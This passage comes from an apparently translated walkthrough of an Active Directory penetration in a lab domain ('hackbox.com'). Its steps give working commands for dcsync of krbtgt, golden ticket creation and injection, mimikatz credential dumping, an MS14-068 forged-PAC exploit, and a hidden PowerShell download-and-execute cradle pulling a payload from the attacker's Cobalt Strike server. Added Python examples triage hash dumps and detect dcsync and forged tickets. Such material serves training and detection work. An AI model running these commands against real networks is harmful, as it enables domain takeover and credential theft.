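EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "": LM storage is disabled for the account
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of "": the account has an empty password

# username:RID:LM:NT[:::], optionally prefixed with the "[+] " that smart_hashdump prints
PWDUMP = re.compile(
    r"^(?:\[\+\]\s*)?(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]*):(?P<nt>[0-9a-fA-F]*)(?::.*)?$")

# Constructed sample output (not the page's values): well-formed, empty-password,
# LM-enabled, truncated and unparsable lines, to exercise every branch below.
SAMPLE = """\
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef
[+] Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210
[+] legacy:1105:0c0a1b2c3d4e5f60718293a4b5c6d7e8:00112233445566778899aabbccddeeff
[+] WEB$:1104:aad3b435b51404eeaad3b435b51404ee:fd0c8f5bc45e86c9ca5c8a289
this line is not a hash record
"""


def triage_dump(text):
    """Parse pwdump-style lines into records with triage flags; never raises on bad input."""
    records = []
    for raw in text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        m = PWDUMP.match(raw)
        if not m:
            records.append({"user": None, "rid": None, "flags": ["unparsed line"], "raw": raw})
            continue
        user, rid = m["user"], int(m["rid"])
        lm, nt = m["lm"].lower(), m["nt"].lower()
        flags = []
        if len(nt) != 32:
            flags.append("malformed NT hash (%d hex chars, expected 32)" % len(nt))
        elif nt == EMPTY_NT:
            flags.append("empty password")
        if lm and lm != EMPTY_LM:
            flags.append("LM hash stored: NoLMHash not enforced")
        if user.lower() == "krbtgt":
            flags.append("krbtgt exposed: forged TGTs possible until krbtgt is reset twice")
        if user.endswith("$"):
            flags.append("machine account")
        if rid == 500:
            flags.append("built-in Administrator")
        records.append({"user": user, "rid": rid, "flags": flags, "raw": raw})
    return records


def accounts_needing_reset(records):
    """Every parsed account except machine accounts, which rotate their own passwords."""
    return sorted(r["user"] for r in records if r["user"] and not r["user"].endswith("$"))


if __name__ == "__main__":
    recs = triage_dump(SAMPLE)
    for r in recs:
        print(r["user"] or "?", r["rid"], "; ".join(r["flags"]) or "-")
    print("reset:", ", ".join(accounts_needing_reset(recs)))
```

<p>The reset list is the remediation output: krbtgt is reset twice (with replication time in between) and every human account in the dump gets a new password, while machine accounts are left to their own rotation. A line that fails to parse is kept as a record so the analyst sees it rather than silently losing it.</p>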
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:13.1pt;margin-left:0cm;text-indent:0cm;line-height:107%;">
<a name="_Toc21077"></a><span lang="EN-US" style="font-family:Cambria,serif;font-weight:normal;">5.1.17. </span><span><span style="font-family:宋体;font-weight:normal;">Create a golden ticket</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">For long-term maintenance of access, making a golden ticket is the safer option.</span><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:10.75pt;margin-left:-.25pt;">
<a name="_Toc21078"></a><span lang="EN-US">5.1.18. </span><span><span style="font-family:宋体;font-weight:normal;">Obtain the </span><span lang="EN-US">NTLM, SID and RID</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:40.05pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:宋体;font-size:10.5pt;line-height:112%;">wmic useraccount where name="krbtgt" get sid</span><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:12.95pt;margin-left:-.25pt;line-height:107%;">
<a name="_Toc21079"></a><span lang="EN-US" style="font-family:宋体;font-weight:normal;">5.1.19. </span><span><span style="font-family:宋体;font-weight:normal;">Steal domain administrator privileges on the domain controller</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:4.1pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:9.0pt;line-height:107%;">SYSTEM privileges cannot perform a <span lang="EN-US">dcsync</span>, so switch to domain administrator privileges</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:141%;margin-bottom:0cm;margin-left:-.25pt;margin-right:295.2pt;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:宋体;font-size:9.0pt;line-height:141%;">steal_token 2812<br />dcsync_ntlm krbtgt</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:27.85pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="151" src="https://www.2k8.org/content/uploadfile/202203/17/132be026.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
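<p>The dcsync step above is visible on the domain controller as Security event 4662 on the domain object, with the directory-replication control-access rights listed in the Properties field; that is the detection point defenders use. The Python below is an added example, not from the page: it flags replication requests by any principal outside an allow-list of domain controller accounts. The GUIDs are the real Active Directory extended-right identifiers; the event records and the allow-list are constructed for the example.</p>

```python
import re

# Active Directory extended rights that directory replication requires. A 4662 whose
# Properties list any of them means the caller asked the DC for replication data.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Principals expected to replicate: domain controller machine accounts, plus any directory
# synchronisation service account the organisation runs. Constructed allow-list.
EXPECTED_REPLICATORS = {"DC$", "DC2$"}

GUID = re.compile(r"\{?([0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12})\}?")

# Constructed 4662 records (not from the page), flattened from the Security log schema.
# %%7688 is the "Control Access" access type; 19195a5b-... is the domainDNS object class.
EVENTS_4662 = [
    {"time": "2020-06-21T23:40:11", "subject": "DC2$", "domain": "HACKBOX",
     "object_type": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"time": "2020-06-21T23:58:45", "subject": "Administrator", "domain": "HACKBOX",
     "object_type": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"time": "2020-06-21T23:59:02", "subject": "web", "domain": "HACKBOX",
     "object_type": "%{bf967aba-0de6-11d0-a285-00aa003049e2}",
     "properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]


def replication_rights(properties):
    """Names of the replication rights present in a 4662 Properties field (order preserved)."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def detect_dcsync(events, expected=EXPECTED_REPLICATORS):
    """Flag replication requests from any principal that is not a known replicator."""
    alerts = []
    for ev in events:
        rights = replication_rights(ev["properties"])
        if not rights or ev["subject"] in expected:
            continue  # no replication asked for, or a DC pulling changes as usual
        alerts.append({"time": ev["time"],
                       "subject": "%s\\%s" % (ev["domain"], ev["subject"]),
                       "rights": rights})
    return alerts


if __name__ == "__main__":
    for a in detect_dcsync(EVENTS_4662):
        print(a["time"], a["subject"], ", ".join(a["rights"]))
```

<p>4662 is only generated when "Audit Directory Service Access" is enabled and the domain object's SACL audits Control Access; the allow-list must be kept in step with the real DC inventory, since a domain controller omitted from it will alert on every replication cycle.</p>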
<h3 style="margin-left:-.25pt;">
<a name="_Toc21080"></a><span lang="EN-US">5.1.20. </span><span><span style="font-family:宋体;font-weight:normal;">Generate the golden ticket</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:137%;margin-bottom:16.05pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:137%;">golden_ticket_create -d &lt;</span><span style="font-family:宋体;font-size:9.0pt;line-height:137%;">domain name</span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:137%;">&gt; -u &lt;</span><span style="font-family:宋体;font-size:9.0pt;line-height:137%;">any username</span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:137%;">&gt; -s &lt;Domain SID&gt; -k &lt;krbtgt NTLM Hash&gt; -t &lt;</span><span style="font-family:宋体;font-size:9.0pt;line-height:137%;">local path to store the ticket, e.g. </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:137%;">/tmp/krbtgt.ticket&gt;</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:110%;margin-bottom:40.9pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:110%;">golden_ticket_create -d hackbox.com -u moonsec -s S-1-5-21-2005268815-658469957-1189185684 -k 6f60ace6accbcb76078ccc0312174e98 -t /tmp/krbtgt.ticket</span><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:12.95pt;margin-left:-.25pt;line-height:107%;">
<a name="_Toc21081"></a><span lang="EN-US" style="font-family:宋体;font-weight:normal;">5.1.21. </span><span><span style="font-family:宋体;font-weight:normal;">Inject the golden ticket</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:4.1pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:9.0pt;line-height:107%;">Switch to the </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:107%;">web </span><span style="font-family:宋体;font-size:9.0pt;line-height:107%;">server and purge all the credentials</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:136%;margin-bottom:3.15pt;margin-left:-.25pt;margin-right:265.85pt;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:136%;">kerberos_ticket_use /tmp/test.ticket<br />dir \\dc\c$</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:54.3pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="553" height="350" src="https://www.2k8.org/content/uploadfile/202203/17/4a499e49.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
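<p>Detection view of the forged ticket injected above, as an added example that is not part of the original write-up: a golden ticket is minted off the domain controller, so the KDC never logs a 4768 TGT issuance for it; a ticket made for -u moonsec names a user that need not exist in the directory; the realm is written exactly as given on the command line rather than as the KDC spells it; and a ticket derived from the NTLM hash is RC4-based. The Python scores 4769 service-ticket requests against those four heuristics. The account list reuses the names from the smart_hashdump listing earlier on the page; the realm spellings, the events and the ten-hour TGT lifetime are assumptions of the example.</p>

```python
from datetime import datetime, timedelta

# Accounts that exist in the directory (constructed; names taken from the smart_hashdump
# listing earlier on the page). In production this comes from an LDAP export.
DIRECTORY_ACCOUNTS = {"administrator", "web", "krbtgt", "dc$", "web$"}
# Realm spellings the KDC itself writes into its events (constructed for this lab domain).
EXPECTED_REALMS = {"HACKBOX", "HACKBOX.COM"}
RC4_HMAC = "0x17"                    # TicketEncryptionType for RC4-HMAC; AES is 0x11/0x12
TGT_LIFETIME = timedelta(hours=10)   # default TGT lifetime: a TGS request should follow a 4768 within it

# Constructed domain-controller Security events (not from the page):
# 4768 = TGT issued (AS-REQ), 4769 = service ticket requested (TGS-REQ).
EVENTS = [
    {"id": 4768, "time": "2020-06-22T00:01:00", "account": "web", "realm": "HACKBOX.COM",
     "enc": "0x12", "ip": "10.10.10.80"},
    {"id": 4769, "time": "2020-06-22T00:01:02", "account": "web@HACKBOX.COM", "realm": "HACKBOX.COM",
     "service": "DC$", "enc": "0x12", "ip": "10.10.10.80"},
    {"id": 4769, "time": "2020-06-22T00:09:30", "account": "moonsec@hackbox.com", "realm": "hackbox.com",
     "service": "DC$", "enc": "0x17", "ip": "10.10.10.80"},
]


def _account(name):
    # "web@HACKBOX.COM" -> "web"
    return name.split("@", 1)[0].lower()


def _ts(event):
    return datetime.fromisoformat(event["time"])


def score_service_ticket_requests(events, directory=DIRECTORY_ACCOUNTS,
                                  realms=EXPECTED_REALMS, lookback=TGT_LIFETIME):
    """Score each 4769 against four forged-ticket heuristics; return only those with a hit."""
    events = sorted(events, key=_ts)
    alerts = []
    for i, ev in enumerate(events):
        if ev["id"] != 4769:
            continue
        acct = _account(ev["account"])
        reasons = []
        if acct not in directory:
            reasons.append("account %r does not exist in the directory" % acct)
        if ev["realm"] not in realms:
            reasons.append("realm written as %r, expected one of %s" % (ev["realm"], sorted(realms)))
        if ev["enc"] == RC4_HMAC:
            reasons.append("RC4-HMAC ticket in an AES-capable domain")
        # the KDC issued no TGT for this account, yet a TGS request arrived with one
        had_tgt = any(p["id"] == 4768 and _account(p["account"]) == acct
                      and _ts(ev) - _ts(p) <= lookback for p in events[:i])
        if not had_tgt:
            reasons.append("no 4768 TGT issuance for this account within %s" % lookback)
        if reasons:
            alerts.append({"time": ev["time"], "account": acct, "source_ip": ev["ip"],
                           "score": len(reasons), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in score_service_ticket_requests(EVENTS):
        print(a["time"], a["account"], a["source_ip"], "score=%d" % a["score"])
        for r in a["reasons"]:
            print("   -", r)
```

<p>The missing-4768 check is the most robust of the four, but only if every domain controller's log is in the same store, since the TGT may have been issued by a different DC than the one answering the TGS request. The other three are heuristics that an attacker can work around by choosing an existing account and the right spellings, so they are scored rather than treated as binary.</p>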
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:25.05pt;margin-left:-.25pt;">
<a name="_Toc21082"></a><span lang="EN-US">5.2. cobaltstrike </span><span><span style="font-family:黑体;font-weight:normal;">for internal domain penetration</span></span><span lang="EN-US"></span>
</h2>
<h3 style="margin-left:-.25pt;">
<a name="_Toc21083"></a><span lang="EN-US">5.2.1. </span><span><span style="font-family:宋体;font-weight:normal;">Set up the </span><span lang="EN-US">teamserver</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">./teamserver 192.168.0.127 4477</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Configure the listener</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:43.85pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="553" height="191" src="https://www.2k8.org/content/uploadfile/202203/17/fb4662ff.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:27.0pt;margin-left:-.25pt;">
<a name="_Toc21084"></a><span lang="EN-US">5.2.2. </span><span><span style="font-family:宋体;font-weight:normal;">On the </span><span lang="EN-US">web </span></span><span><span style="font-family:宋体;font-weight:normal;">server, execute the </span><span lang="EN-US">powershell </span></span><span><span style="font-family:宋体;font-weight:normal;">malicious download code</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:7.5pt;line-height:107%;">powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.127:80/a'))"</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:23.95pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="553" height="161" src="https://www.2k8.org/content/uploadfile/202203/17/2af40b4e.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-left:-.25pt;">
<a name="_Toc21085"></a><span lang="EN-US">5.2.3. </span><span><span style="font-family:宋体;font-weight:normal;">Set the sleep interval</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Enter the </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">beacon</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:40.35pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Set the interval with </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">sleep 0</span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">, otherwise it will interfere with the later operations</span><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:0cm;margin-left:-.25pt;">
<a name="_Toc21086"></a><span lang="EN-US">5.2.4. </span><span><span style="font-family:宋体;font-weight:normal;">Obtain the </span><span lang="EN-US">hash </span></span><span><span style="font-family:宋体;font-weight:normal;">values and the trusted hosts in the domain</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="241" src="https://www.2k8.org/content/uploadfile/202203/17/9b0b9f5c.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:0cm;margin-left:-.25pt;">
<a name="_Toc21087"></a><span lang="EN-US">5.2.5. </span><span><span style="font-family:宋体;font-weight:normal;">Scan hosts in the domain</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="553" height="350" src="https://www.2k8.org/content/uploadfile/202203/17/eed8f1ce.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:38.45pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="477" src="https://www.2k8.org/content/uploadfile/202203/17/e77f3d66.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:.25pt;margin-left:-.25pt;line-height:256%;">
<a name="_Toc21088"></a><span lang="EN-US">5.2.6. CS </span><span><span style="font-family:宋体;font-weight:normal;">bundles many </span><span lang="EN-US">net </span></span><span><span style="font-family:宋体;font-weight:normal;">commands</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:256%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:256%;">These commands run from the beacon and make collecting domain information quick and convenient.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:41.4pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="408" src="https://www.2k8.org/content/uploadfile/202203/17/177acee1.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:14.75pt;margin-left:-.25pt;">
<a name="_Toc21089"></a><span lang="EN-US">5.2.7. Cobalt Strike mimikatz: </span><span><span style="font-family:宋体;font-weight:normal;">dump plaintext passwords and hashes from the web server</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="555" height="219" src="https://www.2k8.org/content/uploadfile/202203/17/924b0e1b.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:40.55pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="264" src="https://www.2k8.org/content/uploadfile/202203/17/c9c83a08.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:1.75pt;margin-left:-.25pt;">
<a name="_Toc21090"></a><span lang="EN-US">5.2.8. dir </span><span><span style="font-family:宋体;font-weight:normal;">against the domain controller </span><span lang="EN-US">dc</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:75.7pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="129" src="https://www.2k8.org/content/uploadfile/202203/17/0d0cb191.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:16.1pt;margin-left:-.25pt;">
<a name="_Toc21091"></a><span lang="EN-US">5.2.9. Cobalt Strike MS14-068: </span><span><span style="font-family:宋体;font-weight:normal;">privilege escalation to the domain controller</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:7.75pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="553" height="153" src="https://www.2k8.org/content/uploadfile/202203/17/b1a26ad3.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">The conversion threw an error; probably a file-type problem.</span><span lang="EN-US"></span>
</p>
<h5 style="margin-top:0cm;margin-right:0cm;margin-bottom:18.8pt;margin-left:-.25pt;">
<span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:110%;">5.2.9.1. </span><span style="font-family:黑体;font-size:14.0pt;font-weight:normal;line-height:110%;">Create the ticket with the </span><span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:110%;">py </span><span style="font-family:黑体;font-size:14.0pt;font-weight:normal;line-height:110%;">script</span><span lang="EN-US"></span>
</h5>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:6.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">First disable bash history expansion with </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">set +H</span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">, otherwise the </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">!@# </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">at the start of the password is expanded by the shell instead of reaching the script. The script goes through proxychains because the DC at 10.10.10.149 sits on the internal network. </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">-u </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">is user@domain, </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">-s </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">that user's SID, </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">-d </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">the DC and </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">-p </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">the clear-text password; the script requests a TGT with a forged PAC that marks the ordinary user as a domain admin and writes it to a .ccache file:</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">root@kali:~/Desktop/webhack123/pykek# set +H</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:6.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">root@kali:~/Desktop/webhack123/pykek# proxychains python ms14-068.py -u [email protected] -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:45.65pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="553" height="129" src="https://www.2k8.org/content/uploadfile/202203/17/026807f6.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h5 style="margin-top:0cm;margin-right:0cm;margin-bottom:18.8pt;margin-left:-.75pt;text-indent:0cm;tab-stops:center 222.05pt;">
<span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:110%;">5.2.9.2.<span> </span>KrbCredExport: </span><span style="font-family:黑体;font-size:14.0pt;font-weight:normal;line-height:110%;">convert the </span><span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:110%;">.ccache </span><span style="font-family:黑体;font-size:14.0pt;font-weight:normal;line-height:110%;">file to </span><span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:110%;">kirbi </span><span style="font-family:黑体;font-size:14.0pt;font-weight:normal;line-height:110%;">format</span><span lang="EN-US"></span>
</h5>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">python KrbCredExport.py ../pykek/[email protected] user.ticket</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:45.85pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="44" src="https://www.2k8.org/content/uploadfile/202203/17/62887eb4.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
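<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:6.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">The conversion error noted above is most often one of the files being in the wrong format: ms14-068.py writes an MIT credential cache (.ccache), KrbCredExport turns that into a KRB-CRED (.kirbi), and Beacon's kerberos_ticket_use expects the .kirbi. The Python below is an added example, not code from this page, from pykek or from KrbCredExport: it identifies a ticket file from its leading bytes and reads the default principal out of a ccache, so you can confirm whose TGT it holds before converting it. The sample ccache and the user name alice are constructed here, since the page elides the real user name.</span><span lang="EN-US"></span>
</p>

```python
"""Identify Kerberos ticket files before handing them to KrbCredExport / kerberos_ticket_use.

Added example. pykek's ms14-068.py writes an MIT credential cache (.ccache);
KrbCredExport expects that and emits a KRB-CRED (.kirbi); Beacon's
kerberos_ticket_use wants the .kirbi. A conversion error is usually one of
those files being in the wrong format, so check the magic bytes first.
"""
import base64
import struct
from typing import Optional

# Leading bytes of an MIT ccache: 0x05 followed by the format version.
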